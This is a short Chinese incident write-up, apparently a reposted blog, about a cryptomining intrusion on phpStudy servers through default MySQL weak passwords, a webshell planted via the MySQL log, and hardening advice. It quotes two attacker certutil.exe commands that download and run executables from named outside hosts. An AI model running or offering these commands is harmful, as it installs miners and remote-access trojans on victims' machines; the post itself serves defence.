针对phpStudy网站服务器的入侵

今天客户服务器上出现报警,查找了下原因,发现根目录下有wk.php

E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
         2173 Quit    
190207 18:31:59     2174 Connect    root@localhost on 
         2174 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2174 Init DB    mysql
         2174 Init DB    mysql
         2174 Query    SELECT ''wk.exe');?>'
         2174 Query    SHOW VARIABLES LIKE 'language'
         2174 Quit    
190207 18:32:00     2175 Connect    root@localhost on 
         2175 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2175 Init DB    mysql
         2175 Init DB    mysql
         2175 Query    set global general_log='off'

查了下原因,是针对phpStudy网站服务器进行批量入侵的挖矿木马

攻击者对互联网上的服务器进行批量扫描,发现易受攻击的phpStudy系统后,利用用户在安装时未进行修改的MySQL弱密码进行登录,并进一步植入WebShell,然后通过shell下载挖矿木马挖门罗币。

针对phpStudy网站服务器的入侵_第1张图片

 

 中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码root/root,且开启在外网3306端口,在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。

特点:

  (1)都是通过探测phpStudy搭建的php环境进行攻击

  (2)通过webshell植入挖矿木马时,白利用certutil.exe

命令1

certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe

命令2

certutil.exe  -urlcache  -split  -f  http://m4.rui2.net/upload/12/2016/10/wk.exe  &wk.exe

  (3)挖矿木马通过bat脚本启动,且矿机采用xmr-stak挖矿工具

  (4)在挖矿的同时植入大灰狼远控木马

安全建议:

  (1)修复系统漏洞

  (2)集成环境,在安装结束后应及时修改MySQL密码为强密码,最低密码长度不要低于11位,组合最好是字母数字和符号;删除l.php(探针文件),避免被黑客探测入侵

  (3)增加安全策略

参考:https://s.tencent.com/research/report/642.html

转载于:https://www.cnblogs.com/baby123/p/10430445.html

你可能感兴趣的:(针对phpStudy网站服务器的入侵)